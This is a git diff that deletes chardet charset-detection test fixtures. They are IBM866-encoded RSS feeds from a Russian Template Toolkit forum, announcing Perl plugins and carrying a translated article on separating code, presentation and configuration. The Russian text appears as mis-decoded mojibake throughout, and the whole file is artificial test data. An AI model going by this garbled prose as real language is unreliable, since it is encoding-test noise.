&lt;ru&gt;א¨¢¥ג!&lt;/ru&gt; -&lt;/t&gt;</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-75.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - Mon, 4 Apr 2005 06:03:55 GMT - Template::Plugin::TagRescue - ¯« £¨­ ₪«ן ¢כ₪¥«¥­¨ן ג¥£®¢ html ב ¨ב׫מח¥­¨¥¬ - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - ¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-TagRescue-0.06.tar.gz">¢¥אב¨ן 0.06 ¬®₪ד«ן Template::Plugin::TagRescue</a>. ®₪ד«ל ¢כ₪¥«ן¥ג ¯א¨ ¢כ¢®₪¥ (ג.¥. § ¬¥­ן¥ג &lt; &gt; &amp; &quot; ­  ב®®ג¢¥גב¢דמי¨¥ entities) ג¥£¨ html §  ¨ב׫מח¥­¨¥¬ ד× § ­­כו.<br /><br /><div class="code"><pre>[% USE TagRescue %] - -[% FILTER html_except_for('b') -%] -&lt;B&gt;†¨א­כ©!&lt;/B&gt; and &lt;I&gt;דאב¨¢!&lt;/I&gt;&lt;BR&gt; -[%- END %] - -# ‚כ¢®₪: -# &lt;B&gt;†¨א­כ©!&lt;/B&gt; and &amp;lt;I&amp;gt;Italic!&amp;lt;/I&amp;gt;&amp;lt;BR&amp;gt; - -[% '&lt;B&gt;†¨א­כ©!&lt;/B&gt; and &lt;I&gt;דאב¨¢!&lt;/I&gt;&lt;BR&gt;' | html_except_for('i','br') %] - -# ‚כ¢®₪: -# &amp;lt;B&amp;gt;Bold!&amp;lt;/B&amp;gt; and &lt;I&gt;Italic!&lt;/I&gt;&lt;BR&gt; - -[% taglist = ['b', 'br']; '&lt;B&gt;†¨א­כ©!&lt;/B&gt; ¨ &lt;I&gt;דאב¨¢!&lt;/I&gt;&lt;BR&gt;' | html_except_for(taglist) %] - -# ‚כ¢®₪: -# &lt;B&gt;†¨א­כ©!&lt;/B&gt; ¨ &amp;lt;I&amp;gt;דאב¨¢!&amp;lt;/I&amp;gt;&lt;BR&gt;</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-74.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - Tue, 29 Mar 2005 12:46:04 GMT - Template::Plugin::HTML::BBCode - ¯א¥®¡א §®¢ ­¨¥ BBCode ¢ HTML - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/L/LI/LIOL/Template-Plugin-HTML-BBCode-0.01.tar.gz">¢¥אב¨ן 0.01 ¬®₪ד«ן Template::Plugin::HTML::BBCode</a>. ®₪ד«ל ן¢«ן¥גבן ®¡¥אג×®© ¢®×אד£ ¬®₪ד«ן HTML::BBCode ¨ ¯א¥₪®בג ¢«ן¥ג ה¨«לגא bbcode, ×®ג®אכ© § ¬¥­ן¥ג ג¥£¨ א §¬¥גר BBCode ­  ב®®ג¢¥גב¢גדמי¨¥ ג¥£¨ HTML.<br /><br /><div class="code"><pre>[%- USE HTML::BBCode -%] -[% FILTER bbcode %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %] - -[%- USE HTML::BBCode( 'bbcode_limited' - allowed_tags = [ 'b', 'i', 'u' ] -) -%] -[% FILTER bbcode_limited %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %]</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-72.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - Sun, 27 Mar 2005 11:07:13 GMT - Template::Plugin::DBM::Deep - ¨­ג¥אה¥©ב × pure perl DBM - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/M/ME/MERLYN/Template-Plugin-DBM-Deep-0.02.tar.gz">¢¥אב¨ן 0.02 ¬®₪ד«ן Template::Plugin::DBM::Deep</a>. ®₪ד«ל ¯א¥₪®בג ¢«ן¥ג ¨­ג¥אה¥©ב × ¬®₪ד«מ DBM::Deep.<br /><br /><div class="code"><pre> - [% USE db = DBM.Deep(file = &quot;my.db&quot; locking = 1 autoflush = 1); - db.lock; - db.flintstones = { &quot;flintstone&quot; = [&quot;fred&quot; &quot;wilma&quot;] - &quot;rubble&quot; = [&quot;barney&quot; &quot;betty&quot;] }; - db.castaways = [&quot;gilligan&quot; &quot;skipper&quot; &quot;professor&quot; &quot;and the rest&quot; ]; - db.unlock; - -%] - ... - [% db.flintstones.rubble.0; %] -- barney - [% db.castaways.3; %] -- and the rest -</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-71.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - Mon, 14 Mar 2005 12:35:02 GMT - ExtUtils::ModuleMaker::TT - ¯®₪£®ג®¢×  ¬®₪ד«ן × ₪¨בגא¨¡דז¨¨ ¨§ TT-ט ¡«®­®¢ - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/D/DA/DAGOLDEN/ExtUtils-ModuleMaker-TT-0.74.tar.gz">¢¥אב¨ן 0.74 ¬®₪ד«ן ExtUtils::ModuleMaker::TT</a>. ®₪ד«ל ¯®§¢®«ן¥ג בגא®¨גל בג ­₪ אג­כ¥ ה ©«כ, ¢ו®₪ןי¨¥ ¢ ב®בג ¢ ₪¨בגא¨¡דג¨¢  ¬®₪ד«ן (README, Changes, Todo, Build.PL, Makefile.PL, Proxy_Makefile.PL, MANIFEST.SKIP, test.t, module.pm), ¨§ ט ¡«®­®¢ TT. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-68.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - Mon, 14 Mar 2005 12:21:55 GMT - Template::Plugin::String::Compare - בא ¢­¥­¨¥ בגא®× - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-String-Compare-0.01.tar.gz">¢¥אב¨ן 0.01 ¯« £¨­  Template::Plugin::String::Compare</a>, ×®ג®אכ© ¯®§¢®«ן¥ג בא ¢­¨¢ גל בגא®×¨ ¢ בגא®×®¢®¬ ×®­ג¥×בג¥.<br /><br /><div class="code"><pre> -[% IF '2005-03-01' &lt; '2005-04-01' %] -’ ×®¥ בא ¢­¥­¨¥ ¯א®¢®₪¨גבן ¢ ח¨ב«®¢®¬ ×®­ג¥×בג¥. -[% END %] - -[% USE String.Compare %] -[% IF String.Compare.new('2005-03-01') &lt; '2005-04-01' %] -ג® בא ¢­¥­¨¥ ¯א®¨בו®₪¨ג ¢ בגא®×®¢®¬ ×®­ג¥×בג¥. -[% END %] -</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-67.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - Sat, 19 Feb 2005 08:23:15 GMT - ‘א¥₪  ₪«ן א §א ¡®גר eCommerece ¯א¨«®¦¥­¨© Handel - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss -   CPAN ®¯ד¡«¨×®¢ ­ <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CL/CLACO/Handel-0.04.tar.gz">¬®₪ד«ל Handel (¢¥אב¨ן 0.04)</a>. ג®ג ¬®₪ד«ל ¯א¥₪®בג ¢«ן¥ג בא¥₪ד ₪«ן א §א ¡®גר eCommerece ¯א¨«®¦¥­¨© ב ¯®₪₪¥א¦×®© AxKit ¨ Template Toolkit. - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-63.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - Thu, 17 Feb 2005 07:27:20 GMT - Template::Plugin::SSI - ¨ב¯®«ל§®¢ ­¨¥ SSI ¢ ט ¡«®­ ו - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss -   CPAN ®¯ד¡«¨×®¢ ­  <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CO/COREY/Template-Plugin-SSI-0.11.tar.gz">¢¥אב¨ן 0.11 Template::Plugin::SSI</a>. ®₪ד«ל ן¢«ן¥גבן ®¡¥אג×®© ¢®×אד£ CGI::SSI ¨ ¯®§¢®«ן¥ג ¨ב¯®«ל§®¢ גל ¢ ט ¡«®­ ו SSI-₪¨א¥×ג¨¢כ.<br /><br /><div class="code"><pre>[% USE SSI %] - -# ¢×«מח¥­¨¥ (virtual) ה ©«  /foo/bar.inc.html -[% SSI.include('virtual', '/foo/bar.inc.html') %] - -# ¢×«מח¥­¨¥ ה ©«  /foo/bar.inc.html -[% SSI.include('file', '/var/www/html/foo/bar.inc.html') %] - -# ¢כ¯®«­¨גל ×®¬ ­₪ד -[% SSI.exec('cmd', 'ls') %] - -# ¢כ¯®«­¨גל cgi ב×א¨¯ג -[% SSI.exec('cgi', '/cgi-bin/foo.cgi') %] - -# דבג ­®¢¨גל ¯¥א¥¬¥­­דמ ×®­ה¨£דא ז¨¨ ('sizefmt', 'timefmt', ¨«¨ 'errmsg') -[% SSI.config('timefmt', &quot;%Y&quot;) %] - -# ¢כ¢¥בג¨ ­ ¡®א ¯¥א¥¬¥­­דמ ®×אד¦¥­¨ן -[% SSI.echo('DATE_LOCAL') %] - -# דבג ­®¢¨גל «®× «ל­דמ ¯¥א¥¬¥­­דמ ($name = 'Corey') -[% SSI.set('name', 'Corey') %] - -# ¢כ¢¥בג¨ ₪ גד ¯®ב«¥₪­¥© ¬®₪¨ה¨× ז¨¨ 'index.html' -[% SSI.flastmod('file', 'index.html') %] - -# ¢כ¢¥בג¨ א §¬¥א ה ©«  'index.html' -[% SSI.fsize('file', 'index.html') %]</pre></div> - - ‹®¡ ­®¢ ˆ£®אל <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-62.html - Template Toolkit - ¡¨¡«¨®ג¥×  ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - - - diff --git a/chardet/tests/IBM866/forum.template-toolkit.ru.8.xml b/chardet/tests/IBM866/forum.template-toolkit.ru.8.xml deleted file mode 100644 index a130c29..0000000 --- a/chardet/tests/IBM866/forum.template-toolkit.ru.8.xml +++ /dev/null @@ -1,228 +0,0 @@ - - - - - ”®אד¬כ Template Toolkit : ¨¡«¨®ג¥×¨ ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨ ¢ Perl - http://forum.template-toolkit.ru/view_forum/forum_id-8.html?rss - Template Toolkit - ¡כבגא ן, ¬®י­ ן ¨ א בט¨אן¥¬ ן ב¨בג¥¬  ®¡א ¡®גר ט ¡«®­®¢.   ב ©ג¥ א ¡®ג ¥ג ה®אד¬, ¢ ×®ג®א®¬ ®¡בד¦₪ מגבן ¢®¯א®בכ ¨ב¯®«ל§®¢ ­¨ן ¡¨¡«¨®ג¥×¨ ¯® א ¡®ג¥ ב ט ¡«®­ ¬¨. Text::Template, HTML::Template, Mason ¨ ₪אד£¨¥ ¡¨¡«¨®ג¥×¨ - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Thu, 17 Mar 2005 12:03:32 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט ¡«®­כ ¢ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - Tue, 28 Dec 2004 19:07:19 GMT -  §₪¥«¥­¨¥ ×®₪ , ¯א¥₪בג ¢«¥­¨ן, ¨ ×®­ה¨£דא ז¨¨ - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss -   <a target="_blank" href="http://www.theperlreview.com/">Perl Review</a> ®¯ד¡«¨×®¢ ­  בג גלן א © ­  ₪¥ ”®ן (brian d foy) &quot;Separating Code, Presentation, and Configuration&quot;. ¨¦¥ ¯א¨¢®₪¨גבן ¯¥א¥¢®₪ בג גל¨.<br /><br /><span style="font-weight:bold">א גר© ®¡§®א.</span><br /><br /> ¢§ן« ¯א®£א ¬¬ד ¨§ ¯א¥₪כ₪די¥© בג גל¨ ¨ א §₪¥«¨« ×®₪, ¯א¥₪בג ¢«¥­¨¥ ¨ ×®­ה¨£דא ז¨מ, חג®¡כ ב₪¥« גל ¯א®£א ¬¬ד ¡®«¥¥ £¨¡×®© ¨ «¥£×®© ₪«ן ¯®₪₪¥א¦×¨.<br /><br /><span style="font-weight:bold">1. ‚¢¥₪¥­¨¥.</span><br /><br />‚ ¯®ב«¥₪­¥¬ ¢כ¯דב×¥ ן ¯א¥₪בג ¢¨« ¯א®£א ¬¬ד, ×®ג®אדמ ן ¨ב¯®«ל§דמ ₪«ן ג®£®, חג®¡כ § ¡¨א גל ¨ ®ג®¡א ¦ גל Rich Site Summaries (RSS) ב ₪אד£¨ו ¢¥¡-ב ©ג®¢<span style="font-weight:bold"><sup>1</sup></span>. ‚ ×®₪¥ ן ¨ב¯®«ל§®¢ « «¨ג¥א «ל­כ¥ ¢¥«¨ח¨­כ, חג®¡כ ד× § גל נר¥ ה ©«כ § £אד¦ גל ¨ × × ¯א¥₪בג ¢«ןגל ₪ ­­כ¥, ¨ ®¡¥י « חג® ¢ םג®¬ ¢כ¯דב×¥ ן םג® ¨ב¯א ¢«מ.<br /><br /><span style="font-style:italic">‹¨בג¨­£ 1</span> ב®₪¥א¦¨ג ¯א®£א ¬¬ד, ×®ג®אדמ ן ¯א¥₪בג ¢«ן« ¢ ¯א¥₪כ₪די¥¬ ¢כ¯דב×¥. ‚ ¬ בב¨¢¥ <span style="font-weight:bold">@files</span> וא ­ןגבן ה ©«כ, ×®ג®אכ¥ ­¥®¡ו®₪¨¬® § £אד§¨גל, <span style="font-weight:bold">$base</span> - × ג «®£, £₪¥ ב®וא ­ן¥גבן ¢כ¢®₪, ¨ ­¥ב×®«ל×® ¢כא ¦¥­¨© <span style="font-weight:bold">print</span> ב®§₪ מג HTML ב ¯®₪בג ­®¢×®© ¯א®בגכו ¯¥א¥¬¥­­כו (חג® ¯א¥₪¯®חג¨ג¥«ל­¥¥ ב× ¦¥¬ ח¥¬ ¨ב¯®«ל§®¢ גל HTML-הד­×ז¨¨ ¬®₪ד«ן CGI). ג® ­¥£¨¡×¨© ¨ גאד₪­כ© ₪«ן ב®¯א®¢®¦₪¥­¨ן ×®₪. ®£₪  ן § ו®חד ¯®¬¥­ןגל ב¯¨ב®× ב ©ג®¢ ¨«¨ ¢כ¢®₪, ן א¨ב×דמ ב«®¬ גל ¯א®£א ¬¬ד, ¥ב«¨ ­ ¡¥אד חג®-ג® ­¥¯א ¢¨«ל­® ¨«¨ ב₪¥« מ ₪אד£דמ ®ט¨¡×ד.<br /><br /><span style="font-style:italic">‹¨בג¨­£ 1: ‡ £אד§ח¨× RSS ב ¦¥בג×®¯א®¯¨ב ­­כ¬¨ §­ ח¥­¨ן¬¨.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use XML::RSS; -6 -7 my @files = qw( -8 http://use.perl.org/useperl.rss -9 http://search.cpan.org/rss/search.rss -10 http://jobs.perl.org/rss/standard.rss -11 http://www.perl.com/pace/perlnews.rdf -12 http://www.perlfoundation.org/perl-foundation.rdf -13 http://www.stonehenge.com/merlyn/UnixReview/ur.rss -14 http://www.stonehenge.com/merlyn/WebTechniques/wt.rss -15 http://www.stonehenge.com/merlyn/LinuxMag/lm.rss -16 ); -17 -18 my $base = '/usr/home/comdog/TPR/rss-html'; -19 -20 foreach my $url ( @files ) -21 { -22 my $file = $url; -23 -24 $file =~ s|.*/||; -25 -26 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -27 -28 unless( $result ) -29 { -30 warn &quot;Could not open [$file] for writing! $!&quot;; -31 next; -32 } -33 -34 select $fh; -35 -36 my $rss = XML::RSS-&gt;new(); -37 my $data = get( $url ); -38 $rss-&gt;parse( $data ); -39 -40 my $channel = $rss-&gt;{channel}; -41 my $image = $rss-&gt;{image}; -42 -43 print &lt;&lt;&quot;HTML&quot;; -44 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -45 &lt;table cellpadding=5&gt; -46 &lt;tr&gt;&lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -47 HTML -48 -49 if( $image-&gt;{url} ) -50 { -51 my $img = qq|&lt;img src=&quot;$$image{url}&quot; alt=&quot;$$channel{title}&quot;&gt;|; -52 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$img&lt;/a&gt;&lt;br&gt;\n|; -53 } -54 else -55 { -56 print qq|&lt;a href=&quot;$$channel{link}&quot;&gt;$$channel{title}&lt;/a&gt;&lt;br&gt;\n|; -57 } -58 -59 print &lt;&lt;&quot;HTML&quot;; -60 &lt;font size=&quot;-1&quot;&gt;$$channel{description}&lt;/font&gt; -61 &lt;/td&gt;&lt;/tr&gt; -62 &lt;tr&gt;&lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -63 HTML -64 -65 foreach my $item ( @{ $rss-&gt;{items} } ) -66 { -67 print qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -68 } -69 -70 print &lt;&lt;&quot;HTML&quot;; -71 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt; -72 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -73 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -74 HTML -75 -76 close $fh; -77 }</pre></div><br /><br /><span style="font-weight:bold">2. ג₪¥«¥­¨¥ ¯א¥₪בג ¢«¥­¨ן.</span><br /><br />•®א®ט¨© ₪¨§ ©­ ­¥ ב¢ן§כ¢ ¥ג ב¥¡ן ב ח בג­כ¬ ¯א¥₪בג ¢«¥­¨¥¬ ₪ ­­כו. ®ן ¯א®£א ¬¬  ₪®«¦­  § ¡א גל ₪ ­­כ¥ ¨ ב₪¥« גל ¨ו ₪®בגד¯­כ¬¨ ח¥¬ד-ג®, חג® ¨ו ¯א¥₪בג ¢«ן¥ג - ג®, חג® ן א ¡®ג מ ב RSS ­¥ ₪®«¦­® ¨¬¥גל §­ ח¥­¨ן. ¬®£ד § ו®ג¥גל ¯א®¨§¢®₪¨גל HTML, TeX, ¯א®בג®© ג¥×בג, ¨«¨ ₪ ¦¥ × ×®©-ג® ה®א¬ ג, ×®ג®אכ© ­¥ ¬®£ד ב¥¡¥ ¯א¥₪בג ¢¨גל.<br /><br />‚®§¬®¦­® ×ג®-ג® § ו®ח¥ג ­ ¯¨ב גל ב®¡בג¢¥­­דמ ב¨בג¥¬ד ₪«ן א ¡®גכ ב ט ¡«®­ ¬¨, ­® ¬­¥ ­א ¢¨גבן ¬®₪ד«ל Text::Template  א× -„¦¥©ב®­  „®¬¨­דב  (Mark-Jason Dominus). ­ ₪¥« ¥ג ¢ב¥ חג® ¬­¥ ­¥®¡ו®₪¨¬®, ­¥ גא¥¡ד¥ג ₪«ן ב¢®¥© א ¡®גכ ₪®¯®«­¨ג¥«ל­כו ¯א®£א ¬¬ ¨ ­ ¯¨ב ­ ¯®«­®בגלמ ­  Perl. “ ­¥£® ¯א®בג®© ¨­ג¥אה¥©ב ¨ ¬­¥ ­¥ גא¥¡ד¥גבן ¨§דח גל ן§כ× ט ¡«®­®¢, ¯®ב×®«ל×ד ט ¡«®­כ ¨ב¯®«ל§דמג Perl.<br /><br /><span style="font-style:italic">‹¨בג¨­£ 2</span> - םג® ג  ¦¥ ¯א®£א ¬¬ , ג®«ל×® ¢¬¥בג® ¢­¥₪א¥­­®£® HTML ¨ב¯®«ל§ד¥גבן Text::Template. ‚ בגא®×¥ 5 ן ¨¬¯®אג¨אדמ ¬¥ג®₪ fill_in_file(). ‚ בגא®×¥ 13 ד× §כ¢ מ ט ¡«®­, ×®ג®אכ© ¡ד₪ד ¨ב¯®«ל§®¢ גל. ‚¥בל HTML, ¨ב¯®«ל§ד¥¬כ© ¯א®£א ¬¬®©, ג¥¯¥אל ¢כ­¥ב¥­ ¢ ה ©« ט ¡«®­ , ¯א¨¢¥₪¥­­כ© ¢ <span style="font-style:italic">«¨בג¨­£¥ 3</span>.<br /><br />®₪ד«ל Text::Template ¬®¦¥ג ¯א¨­¨¬ גל ₪ ­­כ¥ × × ו¥ט. «מח¨ ו¥ט  בג ­®¢ןגבן ¨¬¥­ ¬¨ ¯¥א¥¬¥­­כו ¢ ט ¡«®­¥,   §­ ח¥­¨ן - §­ ח¥­¨ן¬¨ ¯¥א¥¬¥­­כו ט ¡«®­ ,   ג ×¦¥ ®¯א¥₪¥«ןמג ג¨¯ ¯¥א¥¬¥­­כו. …ב«¨ §­ ח¥­¨¥ ו¥ט  ¯א®בג®© ב× «ןא, ¯¥א¥¬¥­­ ן ט ¡«®­  ב× «ןא. …ב«¨ §­ ח¥­¨¥ ו¥ט  -  ­®­¨¬­כ© ¬ בב¨¢, ¯¥א¥¬¥­­ ן ט ¡«®­  - ¬ בב¨¢, ¨ ג × ₪ «¥¥.<br /><br />¡ך¥×ג, ב®§₪ ¢ ¥¬כ© XML::RSS -  ­®­¨¬­כ© ו¥ט. ®₪ד«ל ¯א¥₪®בג ¢«ן¥ג  ¡בגא ×ג­כ© ¨­ג¥אה¥©ב ₪«ן ב®§₪ ­¨ן, ­® ­¥ ₪«ן ₪®בגד¯ . ג® ®גח בג¨ ¨¬¥­­® ג®, חג® ן ₪®«¦¥­ ¯¥א¥₪ גל ¬®¥¬ד ט ¡«®­ד. ‚ ט ¡«®­¥ <span style="font-weight:bold">$rss-&gt;channel</span>, ×®ג®א ן ¢ × ח¥בג¢¥ §­ ח¥­¨ן ב®₪¥א¦¨ג  ­®­¨¬­כ© ו¥ט, בג ­®¢¨גבן <span style="font-weight:bold">%channel</span>,   <span style="font-weight:bold">$rss-&gt;items</span>, ב®₪¥א¦ י ן  ­®­¨¬­כ© ¬ בב¨¢ בג ­®¢¨גבן <span style="font-weight:bold">@items</span>.<br /><br /><span style="font-style:italic">‹¨בג¨­£ 2: ˆב¯®«ל§®¢ ­¨¥ ט ¡«®­ .</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use Text::Template qw(fill_in_file); -6 use XML::RSS; -7 -8 my @files = qw( -9 http://use.perl.org/useperl.rss -10 ); -11 -12 my $base = '.'; -13 my $template = 'rss-html.tmpl'; -14 -15 foreach my $url ( @files ) -16 { -17 my $file = $url; -18 -19 $file =~ s|.*/||; -20 -21 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -22 -23 unless( $result ) -24 { -25 warn &quot;Could not open [$file] for writing! $!&quot;; -26 next; -27 } -28 -29 my $rss = XML::RSS-&gt;new(); -30 my $data = get( $url ); -31 $rss-&gt;parse( $data ); -32 -33 print fill_in_file( $template, HASH =&gt; $rss ); -34 close $fh; -35 }</pre></div><br /><br />‚­דגא¨ ט ¡«®­  Text::Template ¨ב¯®«­ן¥ג ¡«®×¨ ×®₪ , ×®ג®אכ¥ ®­ ­ ו®₪¨ג ¬¥¦₪ד ה¨£דא­כ¬¨ ב×®¡× ¬¨. ­ § ¬¥­ן¥ג ¡«®× ¯®ב«¥₪­¨¬ ¢כח¨ב«¥­­כ¬ ¢כא ¦¥­¨¥¬. ˆ¬¥­  ¯¥א¥¬¥­­כו - ׫מח¨ ו¥ט , בבכ«×ד ­  ×®ג®אכ© ן ¯¥א¥₪ « ¢ × ח¥בג¢¥  א£ד¬¥­ג  הד­×ז¨¨ fill_in_file() ¢ ×®₪¥, ¯א¨¢¥₪¥­­®¬ ¢ <span style="font-style:italic">«¨בג¨­£¥ 2</span>.<br /><br /><span style="font-style:italic">‹¨בג¨­£ 3: HTML ט ¡«®­.</span><br /><div class="code"><pre>1 &lt;table cellpadding=1&gt;&lt;tr&gt;&lt;td bgcolor=&quot;#000000&quot;&gt; -2 &lt;table cellpadding=5&gt; -3 &lt;tr&gt; -4 &lt;td bgcolor=&quot;#aaaaaa&quot; align=&quot;center&quot;&gt; -5 &lt;a href=&quot;{ $channel{link} }&quot;&gt;{ -6 -7 $image ? qq|&lt;img src=&quot;$image&quot; alt=&quot;$channel{title}&quot;&gt;| : $channel{title} -8 -9 }&lt;/a&gt;&lt;br&gt; -10 -11 { $channel{description} } -12 &lt;/td&gt; -13 &lt;/tr&gt; -14 -15 &lt;tr&gt; -16 &lt;td bgcolor=&quot;#bbbbff&quot; width=200&gt;&lt;font size=&quot;-1&quot;&gt; -17 { -18 my $str; -19 -20 foreach my $item ( @items ) -21 { -22 $str .= qq|&lt;b&gt;&gt;&lt;/b&gt;&lt;a href=&quot;$$item{link}&quot;&gt;$$item{title}&lt;/a&gt;&lt;br&gt;&lt;br&gt;\n|; -23 } -24 -25 $str; -26 }&lt;/font&gt;&lt;/td&gt; -27 &lt;/tr&gt; -28 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; -29 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;</pre></div><br /><br /> × ג®«ל×® ב¨בג¥¬  ט ¡«®­®¢ § ₪¥©בג®¢ ­ , ן ¬®£ד ¬¥­ןגל ¯א¥₪בג ¢«¥­¨¥ ­¥ ¬¥­ןן «®£¨×ד ×®₪ . …ב«¨ ן ¯א¨¬ד א¥ט¥­¨¥ ¨§¬¥­¨גל ¢¨₪ ¯א¥₪בג ¢«¥­¨ן ₪ ­­כו, ן ¯®¬¥­ןמ ג®«ל×® ט ¡«®­. …ב«¨ ¬­¥ ¢¬¥בג® HTML גא¥¡ד¥גבן ¯א®בג®© ג¥×בג, ן ג®«ל×® ¨§¬¥­מ ¯®₪ ­®¢כ© ה®א¬ ג ט ¡«®­, × × םג® ב₪¥« ­® ¢ <span style="font-style:italic">«¨בג¨­£¥ 4</span>.<br /><br /><span style="font-style:italic">‹¨בג¨­£ 4: ˜ ¡«®­ ₪«ן ®¡כח­®£® ג¥×בג .</span><br /><div class="code"><pre>1 { $channel{title} } -2 -3 { $channel{description} } -4 -5 { -6 my $str; -7 -8 foreach my $item ( @items ) -9 { -10 $str .= qq|* $$item{title}\n|; -11 } -12 -13 $str; -14 }</pre></div><br /><br /><span style="font-weight:bold">3. ג₪¥«¥­¨¥ ×®­ה¨£דא ז¨¨.</span><br /><br />•®א®ט¨© ₪¨§ ©­ ג ×¦¥ ¯®§¢®«ן¥ג  ₪ ¯ג¨א®¢ גל ב×א¨¯ג × א §«¨ח­®¬ד ®×אד¦¥­¨מ. ‚ <span style="font-style:italic">«¨בג¨­£¥ 1</span> ן ¦¥בג×® ¯א®¯¨ב « §­ ח¥­¨¥ ₪¨א¥×ג®א¨¨ ₪«ן ¢כ¢®₪ , חג® ₪¥« ¥ג ¬®© ב×א¨¯ג ואד¯×¨¬ - ¥ב«¨ ¬®ן ₪®¬ ט­ןן ₪¨א¥×ג®א¨ן ¯®¬¥­ן¥גבן, ב×א¨¯ג ב«®¬ ¥גבן. א®¬¥ ג®£® <span style="font-style:italic">¢ «¨בג¨­£¥ 2</span> ¦¥בג×® ¯א®¯¨ב ­® ¨¬ן ט ¡«®­ , ­¥ב¬®גאן ­  ג® חג® ן ¬®£ד ¬¥­ןגל ¯א¥₪בג 